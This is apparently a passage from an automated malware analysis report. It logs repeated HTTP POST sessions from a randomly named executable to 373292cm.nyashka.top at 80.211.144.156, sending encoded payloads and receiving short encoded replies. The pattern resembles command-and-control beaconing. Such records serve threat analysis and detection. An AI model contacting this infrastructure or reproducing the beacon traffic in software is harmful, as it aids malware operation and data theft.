                                    Aug 25, 2024 15:46:12.262065887 CEST2544OUTData Raw: 5f 57 5c 55 54 46 54 5d 5b 5f 5a 51 59 55 58 50 57 50 5d 5d 57 50 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _W\UTFT][_ZQYUXPWP]]WPS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q._, 5; "+=?<="(\7471;?3 3>;>&F$.Y/-
                                    Aug 25, 2024 15:46:12.594561100 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:12.725961924 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    34192.168.2.84974780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:12.862628937 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:13.214818001 CEST2544OUTData Raw: 5f 52 5c 55 54 49 54 5f 5b 5f 5a 51 59 55 58 53 57 5d 5d 52 57 59 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _R\UTIT_[_ZQYUXSW]]RWYS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.,<#.+ 5[=?<.>+-< <3 !?(+X V=Y8&F$.Y/-
                                    Aug 25, 2024 15:46:13.557440042 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:13.691586971 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    35192.168.2.84974880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:14.061595917 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:14.418987036 CEST2544OUTData Raw: 5f 5d 5c 56 54 43 51 5b 5b 5f 5a 51 59 54 58 54 57 5d 5d 53 57 51 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]\VTCQ[[_ZQYTXTW]]SWQS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,3$6<]#V!*(?>*<-<",V728W?9(#=8&F$.Y/)


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    36192.168.2.84974980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:14.690418959 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1848
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:15.042740107 CEST1848OUTData Raw: 5f 55 5c 5f 54 48 51 5b 5b 5f 5a 51 59 57 58 56 57 5e 5d 5a 57 59 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _U\_THQ[[_ZQYWXVW^]ZWYS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X/0 "-4 35*7<-)(#]"<341 *)+] ",>&F$.Y/!
                                    Aug 25, 2024 15:46:15.356370926 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:15.486095905 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 57 2a 0b 26 59 32 05 2f 0a 33 33 32 1d 29 2e 2b 13 2a 04 32 06 25 28 0b 59 32 00 2f 0e 24 15 35 58 29 2e 2d 09 32 11 30 01 2e 24 2b 5d 0c 13 22 58 34 03 32 10 26 02 27 03 2a 38 0d 5c 35 02 3a 13 3f 3a 03 1b 3c 3f 20 10 28 07 06 02 3f 04 00 53 2c 38 35 5f 3a 30 07 0f 37 3e 2b 52 0d 11 27 0d 3c 2e 3e 0b 2a 00 11 17 36 2b 33 58 24 13 22 1e 32 54 26 57 27 00 3c 5c 32 32 25 12 27 31 3d 55 26 3b 36 11 32 3f 0f 54 35 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &W*&Y2/332).+*2%(Y2/$5X).-20.$+]"X42&'*8\5:?:<? (?S,85_:07>+R'<.>*6+3X$"2T&W'<\22%'1=U&;62?T5"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    37192.168.2.84975080.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:14.810148954 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:15.167776108 CEST2544OUTData Raw: 5a 57 5c 5f 51 45 51 5b 5b 5f 5a 51 59 55 58 55 57 5f 5d 52 57 59 53 54 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZW\_QEQ[[_ZQYUXUW_]RWYSTYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.,3'C!44>=(\+=7<7!!;*9#0=..&F$.Y/-
                                    Aug 25, 2024 15:46:15.476811886 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:15.681623936 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    38192.168.2.84975180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:15.814445972 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:16.167793989 CEST2544OUTData Raw: 5a 50 59 54 54 44 51 59 5b 5f 5a 51 59 52 58 5f 57 51 5d 53 57 5c 53 54 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZPYTTDQY[_ZQYRX_WQ]SW\STYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-83!>8_70%+>,\<=_<>8",Q !Q<: _8&F$.Y/1
                                    Aug 25, 2024 15:46:16.500545979 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:16.698179960 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    39192.168.2.84975280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:16.924304008 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:17.277184010 CEST2544OUTData Raw: 5f 50 59 55 54 41 54 58 5b 5f 5a 51 59 54 58 52 57 5f 5d 58 57 50 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _PYUTATX[_ZQYTXRW_]XWPS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-83,".(_ #>+= <-_?,#41(_8 X;&F$.Y/)
                                    Aug 25, 2024 15:46:17.607327938 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:17.808878899 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    40192.168.2.84975380.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:17.935178995 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:18.292678118 CEST2536OUTData Raw: 5a 57 59 52 51 44 54 51 5b 5f 5a 51 59 57 58 53 57 5e 5d 5b 57 5f 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZWYRQDTQ[_ZQYWXSW^][W_S]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,#C"-+#06)0<%_+=47P728R<9$701],.&F$.Y/5
                                    Aug 25, 2024 15:46:18.606100082 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:18.734035969 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    41192.168.2.84975480.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:18.856750965 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:19.216394901 CEST2544OUTData Raw: 5a 52 5c 57 54 47 54 5e 5b 5f 5a 51 59 55 58 53 57 5b 5d 5e 57 50 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZR\WTGT^[_ZQYUXSW[]^WPS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y/ 3D#.' 01=(X?>+[; ,#V '(9+^49X.>&F$.Y/-
                                    Aug 25, 2024 15:46:19.524247885 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:19.656255960 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:19 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    42192.168.2.84975580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:19.789414883 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:20.136524916 CEST2536OUTData Raw: 5a 51 59 50 51 45 54 50 5b 5f 5a 51 59 57 58 52 57 59 5d 58 57 59 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQYPQETP[_ZQYWXRWY]XWYS_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-, ?D!=40>+-??>(=/#<44"3*)#02,&F$.Y/1
                                    Aug 25, 2024 15:46:20.459351063 CEST25INHTTP/1.1 100 Continue


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    43192.168.2.84975680.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:20.528590918 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:20.886771917 CEST1860OUTData Raw: 5f 56 5c 50 51 42 54 5c 5b 5f 5a 51 59 56 58 53 57 50 5d 59 57 5f 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\PQBT\[_ZQYVXSWP]YW_S]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-. /@5+4V9+>(_?=&?=#4#1$W(9# ",&F$.Y/!
                                    Aug 25, 2024 15:46:21.194999933 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:21.327636003 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 25 0d 2a 1c 22 5a 25 2b 24 19 25 33 03 0a 3d 03 23 13 29 3d 3a 05 24 01 39 5f 25 10 0a 13 30 3b 0c 01 2b 10 3a 53 25 01 09 5a 3a 1e 2b 5d 0c 13 22 5d 20 3a 32 13 26 5a 30 5b 3d 5e 34 06 21 02 25 00 3c 2a 26 09 3f 3f 20 10 3e 39 2b 13 2a 29 29 0c 2f 3b 29 5f 2e 0e 07 09 34 3e 2b 52 0d 11 24 57 3f 04 3a 0b 29 2d 38 04 35 01 3f 5e 26 3d 3e 54 25 21 31 0f 24 07 33 00 25 22 26 0d 33 32 2a 0c 31 3b 31 00 26 06 29 56 36 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: %*"Z%+$%3=#)=:$9_%0;+:S%Z:+]"] :2&Z0[=^4!%<*&?? >9+*))/;)_.4>+R$W?:)-85?^&=>T%!1$3%"&32*1;1&)V6#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    44192.168.2.84975780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:20.873373985 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:21.230628014 CEST2536OUTData Raw: 5a 55 5c 55 54 47 54 59 5b 5f 5a 51 59 57 58 5f 57 50 5d 5a 57 58 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZU\UTGTY[_ZQYWX_WP]ZWXS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.. '#.'# >+-<>)\+-#X7??V!"'*)(#3:/&F$.Y/
                                    Aug 25, 2024 15:46:21.555902004 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:21.689743042 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    45192.168.2.84975880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:22.025393963 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:22.370897055 CEST2544OUTData Raw: 5f 51 5c 5f 54 40 51 5b 5b 5f 5a 51 59 52 58 55 57 5a 5d 52 57 5f 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _Q\_T@Q[[_ZQYRXUWZ]RW_S]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q._/364V6)=^>.5+>?Z <3#!/(9# 1Y/&F$.Y/1
                                    Aug 25, 2024 15:46:22.707878113 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:22.841639042 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    46192.168.2.84975980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:22.966831923 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:23.323992968 CEST2544OUTData Raw: 5f 55 5c 54 51 44 54 5b 5b 5f 5a 51 59 55 58 54 57 5c 5d 52 57 5e 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _U\TQDT[[_ZQYUXTW\]RW^SXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.;#@5X#3>>>7+-%(?Z#, W,+_7#V!\;&F$.Y/-
                                    Aug 25, 2024 15:46:23.632026911 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:23.829214096 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    47192.168.2.84976080.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
